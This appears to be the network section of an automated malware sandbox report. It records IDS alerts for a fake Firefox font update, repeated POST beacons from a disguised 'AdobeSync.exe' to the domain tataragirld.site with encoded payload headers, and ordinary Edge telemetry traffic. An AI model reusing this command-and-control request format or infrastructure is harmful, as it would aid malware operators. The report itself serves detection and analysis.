Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:50098 -> 188.114.97.3:443
Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:50094 -> 188.114.97.3:443
Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:50095 -> 188.114.97.3:443
Source: global trafficHTTP traffic detected: POST /2009_New_England_Patriots_season?omlxpbik85mer=%2BBA7Gis1n3XVmJgLCG%2BgLgGVQ1E79NkVzyEnWTmwcxfStdd4il28zJlLoAzjvUO%2BK%2B3IAZfOMRKWTcb%2Fuzy%2FRA%3D%3D HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Edg/126.0.0.0Content-Length: 147Host: tataragirld.site
Source: global trafficHTTP traffic detected: POST /2009_New_England_Patriots_season?omlxpbik85mer=%2BBA7Gis1n3XVmJgLCG%2BgLgGVQ1E79NkVzyEnWTmwcxfStdd4il28zJlLoAzjvUO%2BK%2B3IAZfOMRKWTcb%2Fuzy%2FRA%3D%3D HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Edg/126.0.0.0page: DixBvHnlcM48PxLEc7IjwhmUek35rWnNFExDdZ/M9Mft+Zrs5gy+OkNPDkoJDBS1rnOJb3cy5rolkjMpj17XEomZYCIlqHEt59N5hwContent-Length: 53Host: tataragirld.site
Source: global trafficHTTP traffic detected: POST /2009_New_England_Patriots_season?omlxpbik85mer=%2BBA7Gis1n3XVmJgLCG%2BgLgGVQ1E79NkVzyEnWTmwcxfStdd4il28zJlLoAzjvUO%2BK%2B3IAZfOMRKWTcb%2Fuzy%2FRA%3D%3D HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Edg/126.0.0.0page: DixBvHnlcM48PxLEc7IjwhmUek35rWnNFExDdZ/M9Mft+Zrs5gy+OkNPDkoJDBS1rnOJb3cy5rolkjMpj17XEomZYCIlqHEt59N5hwContent-Length: 208Host: tataragirld.site
Source: global trafficHTTP traffic detected: GET /crx/blobs/AW50ZFvmkG4OHGgRTAu7ED1s4Osp5h4hBv39bA-6HcwOhSY7CGpTiD4wJ46Ud6Bo6P7yWyrRWCx-L37vtqrnUs3U44hGlerneoOywl1xhFHZUyPx_GIMNYxNDzQk9TJs4K4AxlKa5fjk7yW6cw-fwnpof9qnkobSLXrM/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_85_1_0.crx HTTP/1.1Host: clients2.googleusercontent.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /b?rn=1736252351084&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=040C031DFB13691C1F601670FA61685C&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1Host: sb.scorecardresearch.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /b2?rn=1736252351084&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=040C031DFB13691C1F601670FA61685C&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1Host: sb.scorecardresearch.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: UID=13987848475950bac8edbe91736252351; XID=13987848475950bac8edbe91736252351
Source: global trafficHTTP traffic detected: POST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1736252351081&time-delta-to-apply-millis=use-collector-delta&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1Host: browser.events.data.msn.comConnection: keep-aliveContent-Length: 3857sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-platform: "Windows"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Content-Type: text/plain;charset=UTF-8Accept: */*Origin: https://ntp.msn.comSec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: _C_ETH=1; USRLOC=; MUID=040C031DFB13691C1F601670FA61685C; _EDGE_S=F=1&SID=1621632D55D36AC30139764054C26B23; _EDGE_V=1
Source: global trafficHTTP traffic detected: GET /c.gif?rnd=1736252351083&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=cd8507b94268428491b16cc06b6a4f34&activityId=cd8507b94268428491b16cc06b6a4f34&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0&ctsa=mr&CtsSyncId=50B43BAE0D944675912718075641D4BF&MUID=040C031DFB13691C1F601670FA61685C HTTP/1.1Host: c.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: USRLOC=; MUID=040C031DFB13691C1F601670FA61685C; _EDGE_S=F=1&SID=1621632D55D36AC30139764054C26B23; _EDGE_V=1; SM=T
Source: global trafficHTTP traffic detected: POST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1736252354404&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1Host: browser.events.data.msn.comConnection: keep-aliveContent-Length: 11894sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-platform: "Windows"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Content-Type: text/plain;charset=UTF-8Accept: */*Origin: https://ntp.msn.comSec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: USRLOC=; MUID=040C031DFB13691C1F601670FA61685C; _EDGE_S=F=1&SID=1621632D55D36AC30139764054C26B23; _EDGE_V=1; _C_ETH=1; msnup=
Source: global trafficHTTP traffic detected: POST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1736252354414&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1Host: browser.events.data.msn.comConnection: keep-aliveContent-Length: 33609sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-platform: "Windows"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Content-Type: text/plain;charset=UTF-8Accept: */*Origin: https://ntp.msn.comSec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: USRLOC=; MUID=040C031DFB13691C1F601670FA61685C; _EDGE_S=F=1&SID=1621632D55D36AC30139764054C26B23; _EDGE_V=1; _C_ETH=1; msnup=
Source: global trafficHTTP traffic detected: POST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1736252355017&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1Host: browser.events.data.msn.comConnection: keep-aliveContent-Length: 5380sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-platform: "Windows"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Content-Type: text/plain;charset=UTF-8Accept: */*Origin: https://ntp.msn.comSec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: USRLOC=; MUID=040C031DFB13691C1F601670FA61685C; _EDGE_S=F=1&SID=1621632D55D36AC30139764054C26B23; _EDGE_V=1; msnup=
Source: global trafficHTTP traffic detected: POST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1736252355418&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1Host: browser.events.data.msn.comConnection: keep-aliveContent-Length: 9881sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-platform: "Windows"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Content-Type: text/plain;charset=UTF-8Accept: */*Origin: https://ntp.msn.comSec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: USRLOC=; MUID=040C031DFB13691C1F601670FA61685C; _EDGE_S=F=1&SID=1621632D55D36AC30139764054C26B23; _EDGE_V=1; msnup=
Source: global trafficHTTP traffic detected: POST /2009_New_England_Patriots_season?omlxpbik85mer=%2BBA7Gis1n3XVmJgLCG%2BgLgGVQ1E79NkVzyEnWTmwcxfStdd4il28zJlLoAzjvUO%2BK%2B3IAZfOMRKWTcb%2Fuzy%2FRA%3D%3D HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Edg/126.0.0.0page: DixBvHnlcM48PxLEc7IjwhmUek35rWnNFExDdZ/M9Mft+Zrs5gy+OkNPDkoJDBS1rnOJb3cy5rolkjMpj17XEomZYCIlqHEt59N5hwContent-Length: 131275Host: tataragirld.site
Source: global trafficHTTP traffic detected: POST /2009_New_England_Patriots_season?omlxpbik85mer=%2BBA7Gis1n3XVmJgLCG%2BgLgGVQ1E79NkVzyEnWTmwcxfStdd4il28zJlLoAzjvUO%2BK%2B3IAZfOMRKWTcb%2Fuzy%2FRA%3D%3D HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Edg/126.0.0.0page: DixBvHnlcM48PxLEc7IjwhmUek35rWnNFExDdZ/M9Mft+Zrs5gy+OkNPDkoJDBS1rnOJb3cy5rolkjMpj17XEomZYCIlqHEt59N5hwContent-Length: 745Host: tataragirld.site
Source: global trafficHTTP traffic detected: POST /2009_New_England_Patriots_season?omlxpbik85mer=%2BBA7Gis1n3XVmJgLCG%2BgLgGVQ1E79NkVzyEnWTmwcxfStdd4il28zJlLoAzjvUO%2BK%2B3IAZfOMRKWTcb%2Fuzy%2FRA%3D%3D HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Edg/126.0.0.0Content-Length: 147Host: tataragirld.site
Source: global trafficHTTP traffic detected: POST /2009_New_England_Patriots_season?omlxpbik85mer=%2BBA7Gis1n3XVmJgLCG%2BgLgGVQ1E79NkVzyEnWTmwcxfStdd4il28zJlLoAzjvUO%2BK%2B3IAZfOMRKWTcb%2Fuzy%2FRA%3D%3D HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Edg/126.0.0.0page: DixBvHnlcM48PxLEc7IjwhmUek35rWnNFExDdZ/M9Mft+Zrs5gy+OkNPDkoJDBS1rnOJb3cy5rolkjMpj17XEomZYCIlqHEt59N5hwContent-Length: 212Host: tataragirld.site
Source: global trafficHTTP traffic detected: POST /2009_New_England_Patriots_season?omlxpbik85mer=%2BBA7Gis1n3XVmJgLCG%2BgLgGVQ1E79NkVzyEnWTmwcxfStdd4il28zJlLoAzjvUO%2BK%2B3IAZfOMRKWTcb%2Fuzy%2FRA%3D%3D HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Edg/126.0.0.0page: DixBvHnlcM48PxLEc7IjwhmUek35rWnNFExDdZ/M9Mft+Zrs5gy+OkNPDkoJDBS1rnOJb3cy5rolkjMpj17XEomZYCIlqHEt59N5hwContent-Length: 380Host: tataragirld.site
Source: global trafficHTTP traffic detected: POST /2009_New_England_Patriots_season?omlxpbik85mer=%2BBA7Gis1n3XVmJgLCG%2BgLgGVQ1E79NkVzyEnWTmwcxfStdd4il28zJlLoAzjvUO%2BK%2B3IAZfOMRKWTcb%2Fuzy%2FRA%3D%3D HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Edg/126.0.0.0page: DixBvHnlcM48PxLEc7IjwhmUek35rWnNFExDdZ/M9Mft+Zrs5gy+OkNPDkoJDBS1rnOJb3cy5rolkjMpj17XEomZYCIlqHEt59N5hwContent-Length: 53Host: tataragirld.site
Source: global trafficHTTP traffic detected: POST /2009_New_England_Patriots_season?omlxpbik85mer=%2BBA7Gis1n3XVmJgLCG%2BgLgGVQ1E79NkVzyEnWTmwcxfStdd4il28zJlLoAzjvUO%2BK%2B3IAZfOMRKWTcb%2Fuzy%2FRA%3D%3D HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Edg/126.0.0.0page: DixBvHnlcM48PxLEc7IjwhmUek35rWnNFExDdZ/M9Mft+Zrs5gy+OkNPDkoJDBS1rnOJb3cy5rolkjMpj17XEomZYCIlqHEt59N5hwContent-Length: 9953Host: tataragirld.site
Source: global trafficHTTP traffic detected: POST /2009_New_England_Patriots_season?omlxpbik85mer=%2BBA7Gis1n3XVmJgLCG%2BgLgGVQ1E79NkVzyEnWTmwcxfStdd4il28zJlLoAzjvUO%2BK%2B3IAZfOMRKWTcb%2Fuzy%2FRA%3D%3D HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Edg/126.0.0.0page: DixBvHnlcM48PxLEc7IjwhmUek35rWnNFExDdZ/M9Mft+Zrs5gy+OkNPDkoJDBS1rnOJb3cy5rolkjMpj17XEomZYCIlqHEt59N5hwContent-Length: 9953Host: tataragirld.site
Source: global trafficHTTP traffic detected: POST /2009_New_England_Patriots_season?omlxpbik85mer=%2BBA7Gis1n3XVmJgLCG%2BgLgGVQ1E79NkVzyEnWTmwcxfStdd4il28zJlLoAzjvUO%2BK%2B3IAZfOMRKWTcb%2Fuzy%2FRA%3D%3D HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Edg/126.0.0.0page: DixBvHnlcM48PxLEc7IjwhmUek35rWnNFExDdZ/M9Mft+Zrs5gy+OkNPDkoJDBS1rnOJb3cy5rolkjMpj17XEomZYCIlqHEt59N5hwContent-Length: 66611Host: tataragirld.site
Source: global trafficHTTP traffic detected: POST /2009_New_England_Patriots_season?omlxpbik85mer=%2BBA7Gis1n3XVmJgLCG%2BgLgGVQ1E79NkVzyEnWTmwcxfStdd4il28zJlLoAzjvUO%2BK%2B3IAZfOMRKWTcb%2Fuzy%2FRA%3D%3D HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Edg/126.0.0.0page: DixBvHnlcM48PxLEc7IjwhmUek35rWnNFExDdZ/M9Mft+Zrs5gy+OkNPDkoJDBS1rnOJb3cy5rolkjMpj17XEomZYCIlqHEt59N5hwContent-Length: 66611Host: tataragirld.site
Source: global trafficHTTP traffic detected: POST /2009_New_England_Patriots_season?omlxpbik85mer=%2BBA7Gis1n3XVmJgLCG%2BgLgGVQ1E79NkVzyEnWTmwcxfStdd4il28zJlLoAzjvUO%2BK%2B3IAZfOMRKWTcb%2Fuzy%2FRA%3D%3D HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Edg/126.0.0.0page: DixBvHnlcM48PxLEc7IjwhmUek35rWnNFExDdZ/M9Mft+Zrs5gy+OkNPDkoJDBS1rnOJb3cy5rolkjMpj17XEomZYCIlqHEt59N5hwContent-Length: 35Host: tataragirld.site
Source: global trafficHTTP traffic detected: POST /2009_New_England_Patriots_season?omlxpbik85mer=%2BBA7Gis1n3XVmJgLCG%2BgLgGVQ1E79NkVzyEnWTmwcxfStdd4il28zJlLoAzjvUO%2BK%2B3IAZfOMRKWTcb%2Fuzy%2FRA%3D%3D HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Edg/126.0.0.0page: DixBvHnlcM48PxLEc7IjwhmUek35rWnNFExDdZ/M9Mft+Zrs5gy+OkNPDkoJDBS1rnOJb3cy5rolkjMpj17XEomZYCIlqHEt59N5hwContent-Length: 35Host: tataragirld.site
Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
Source: unknownTCP traffic detected without corresponding DNS query: 20.50.201.200
Source: unknownTCP traffic detected without corresponding DNS query: 20.50.201.200
Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
Source: unknownTCP traffic detected without corresponding DNS query: 20.50.201.200
Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
Source: unknownTCP traffic detected without corresponding DNS query: 23.216.132.32
Source: unknownTCP traffic detected without corresponding DNS query: 23.216.132.32
Source: unknownTCP traffic detected without corresponding DNS query: 23.216.132.32
Source: unknownTCP traffic detected without corresponding DNS query: 23.216.132.32
Source: unknownTCP traffic detected without corresponding DNS query: 23.216.132.32
Source: unknownTCP traffic detected without corresponding DNS query: 23.216.132.32
Source: unknownTCP traffic detected without corresponding DNS query: 23.216.132.32
Source: unknownTCP traffic detected without corresponding DNS query: 52.168.117.171
Source: unknownTCP traffic detected without corresponding DNS query: 52.168.117.171
Source: unknownTCP traffic detected without corresponding DNS query: 52.168.117.171
Source: unknownTCP traffic detected without corresponding DNS query: 18.164.96.90
Source: unknownTCP traffic detected without corresponding DNS query: 18.164.96.90
Source: unknownTCP traffic detected without corresponding DNS query: 18.164.96.90
Source: unknownTCP traffic detected without corresponding DNS query: 52.168.117.171
Source: unknownTCP traffic detected without corresponding DNS query: 23.216.132.32
Source: unknownTCP traffic detected without corresponding DNS query: 23.216.132.32
Source: unknownTCP traffic detected without corresponding DNS query: 18.164.96.90
Source: unknownTCP traffic detected without corresponding DNS query: 18.164.96.90
Source: unknownTCP traffic detected without corresponding DNS query: 18.164.96.90
Source: unknownTCP traffic detected without corresponding DNS query: 52.168.117.171
Source: unknownTCP traffic detected without corresponding DNS query: 52.168.117.171
Source: unknownTCP traffic detected without corresponding DNS query: 52.168.117.171
Source: unknownTCP traffic detected without corresponding DNS query: 18.164.96.90
Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
Source: unknownTCP traffic detected without corresponding DNS query: 52.168.117.171
Source: unknownTCP traffic detected without corresponding DNS query: 18.164.96.90
Source: unknownTCP traffic detected without corresponding DNS query: 18.164.96.90
Source: unknownTCP traffic detected without corresponding DNS query: 18.164.96.90
Source: unknownTCP traffic detected without corresponding DNS query: 18.164.96.90
Source: unknownTCP traffic detected without corresponding DNS query: 52.168.117.171
Source: unknownTCP traffic detected without corresponding DNS query: 52.168.117.171
Source: unknownTCP traffic detected without corresponding DNS query: 52.168.117.171
Source: unknownTCP traffic detected without corresponding DNS query: 52.168.117.171
Source: unknownTCP traffic detected without corresponding DNS query: 52.168.117.171
Source: unknownTCP traffic detected without corresponding DNS query: 18.164.96.90
Source: unknownTCP traffic detected without corresponding DNS query: 52.168.117.171
Source: C:\Windows\Temp\{C8FC8EA1-BE1C-448C-9B0E-0B391DC1BF81}\.ba\AdobeSync.exeCode function: 3_2_000B4970 HttpSendRequestA,printf,_CxxThrowException,HttpSendRequestA,InternetReadFile,_CxxThrowException,HttpEndRequestA,3_2_000B4970
Source: global trafficHTTP traffic detected: GET /crx/blobs/AW50ZFvmkG4OHGgRTAu7ED1s4Osp5h4hBv39bA-6HcwOhSY7CGpTiD4wJ46Ud6Bo6P7yWyrRWCx-L37vtqrnUs3U44hGlerneoOywl1xhFHZUyPx_GIMNYxNDzQk9TJs4K4AxlKa5fjk7yW6cw-fwnpof9qnkobSLXrM/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_85_1_0.crx HTTP/1.1Host: clients2.googleusercontent.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /b?rn=1736252351084&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=040C031DFB13691C1F601670FA61685C&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1Host: sb.scorecardresearch.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /b2?rn=1736252351084&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=040C031DFB13691C1F601670FA61685C&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1Host: sb.scorecardresearch.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: UID=13987848475950bac8edbe91736252351; XID=13987848475950bac8edbe91736252351
